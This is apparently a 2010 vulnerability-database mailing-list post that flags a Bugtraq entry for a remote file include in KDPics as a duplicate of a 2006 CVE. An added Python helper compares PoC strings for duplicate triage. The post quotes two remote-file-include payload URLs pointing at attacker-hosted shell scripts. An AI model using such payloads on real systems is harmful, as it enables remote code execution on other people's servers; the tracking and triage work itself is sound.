[VIM] KDPics 'index.php3' Remote File Include Vulnerability

George A. Theall theall at tenable.com
Mon Aug 9 09:15:21 CDT 2010


Bugtraq 42312 was just released to cover a remote file include in
KDPics version 1.11, apparently reported by Fl0riX and covered by
http://packetstormsecurity.nl/1008-exploits/kdpics-rfi.txt. The PoC
looks similar to one reported by Mr_KaLiMaN in 2006 and covered by
CVE-2006-6516 / Bugtraq 21515 / OSVDB 31868:

   site/index.php3?page=http://fl0rix/shell.txt?

versus:

   http://[victim]/[kdpics_path]/index.php3?page=http://evil_script.txt?

Looks like another dup to me. Rob?


George
-- 
theall at tenablesecurity.com
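
The comparison made in the message above can be expressed as a small triage helper. This is an added example, not part of the original post: it reduces each PoC string to the script name and the parameter that carries a remote URL, so that two reports can be checked for the same vector. The function names and the POC_OTHER counter-example are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Schemes that make a parameter value a remote include target.
REMOTE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

def vector_signature(poc):
    """Reduce a PoC request string to (script name, params carrying a remote URL).

    Host, install path and the attacker URL are dropped: they differ between
    reports of the same flaw. urlsplit() is avoided because placeholders such
    as [victim] are rejected as invalid IPv6 literals.
    """
    path, _, query = poc.strip().partition("?")
    script = path.rsplit("/", 1)[-1].lower()
    params = frozenset(
        name.lower()
        for name, value in parse_qsl(query, keep_blank_values=True)
        if REMOTE.match(value)
    )
    return script, params

def same_vector(poc_a, poc_b):
    """True when both PoCs hit the same script through the same parameter(s)."""
    sig_a, sig_b = vector_signature(poc_a), vector_signature(poc_b)
    return bool(sig_a[1]) and sig_a == sig_b

# The two PoC strings quoted in the message.
POC_2010 = "site/index.php3?page=http://fl0rix/shell.txt?"
POC_2006 = "http://[victim]/[kdpics_path]/index.php3?page=http://evil_script.txt?"
# Constructed counter-example: same script, different parameter.
POC_OTHER = "http://[victim]/index.php3?lang=http://example.invalid/x.txt?"

if __name__ == "__main__":
    print(vector_signature(POC_2010))
    print(same_vector(POC_2010, POC_2006))
    print(same_vector(POC_2010, POC_OTHER))
```

A matching signature only flags a candidate duplicate; affected versions and the vulnerable code path still have to be compared before merging entries.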




